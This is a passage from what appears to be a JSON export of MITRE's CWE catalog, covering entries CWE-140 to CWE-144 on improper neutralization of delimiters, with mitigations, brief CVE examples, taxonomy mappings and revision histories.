program, causing the mail program to process those sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0703"},{"Reference":"CVE-2003-0020","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0020"},{"Reference":"CVE-2003-0083","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0083"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Special Elements (Characters or Reserved Words)"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Custom Special Character Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Notes":{"Note":[{"#text":"This weakness can be related to interpretation conflicts or interaction errors in intermediaries (such as proxies or application firewalls) when the intermediary\'s model of an endpoint does not account for protocol-specific special elements.","attr":{"@_Type":"Relationship"}},{"#text":"See this entry\'s children for different types of special elements that have been observed at one point or another. However, it can be difficult to find suitable CVE examples. In an attempt to be complete, CWE includes some types that do not have any associated observed example.","attr":{"@_Type":"Relationship"}},{"#text":"This weakness is probably under-studied for proprietary or custom formats. It is likely that these issues are fairly common in applications that use their own custom format for configuration files, logs, meta-data, messaging, etc. They would only be found by accident or with a focused effort based on an understanding of the format.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Description, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Applicable_Platforms, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Special Elements (Characters or Reserved Words)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Special Elements","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Special Elements","attr":{"@_Date":"2010-04-05"}}]}},"140":{"attr":{"@_ID":"140","@_Name":"Improper Neutralization of Delimiters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes delimiters.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Developers should anticipate that delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Delimiter Problems"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Delimiter Problems","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Delimiters","attr":{"@_Date":"2010-06-21"}}]}},"141":{"attr":{"@_ID":"141","@_Name":"Improper Neutralization of Parameter/Argument Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as parameter or argument delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that parameter/argument delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-0307","Description":"Attacker inserts field separator into input to specify admin privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0307"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Parameter Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Embedded Delimiters", Page 408"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 10, "IFS", Page 604"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Parameter Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Parameter/Argument Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"142":{"attr":{"@_ID":"142","@_Name":"Improper Neutralization of Value Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as value delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that value delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2000-0293","Description":"Multiple internal space, insufficient quoting - program does not use proper delimiter between values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0293"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Value Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Embedded Delimiters", Page 408"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Value Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Value Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"143":{"attr":{"@_ID":"143","@_Name":"Improper Neutralization of Record Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as record delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that record delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1982","Description":"Carriage returns in subject field allow adding new records to data file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1982"},{"Reference":"CVE-2001-0527","Description":"Attacker inserts carriage returns and \\"|\\" field separator characters to add new user/privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0527"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Record Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Embedded Delimiters", Page 408"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Record Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Record Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"144":{"attr":{"@_ID":"144","@_Name":"Improper Neutralization of Line Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as line delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"140","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"93","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that line delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0267","Description":"Linebreak in field of PHP script allows admin privileges when written to data file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0267"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Line Delimiter"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Embedded Delimiters", Page 408"}}},"Notes":{"Note":{"#text":"Depending on the language and syntax being used, this could be the same as the record delimiter (CWE-143).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content 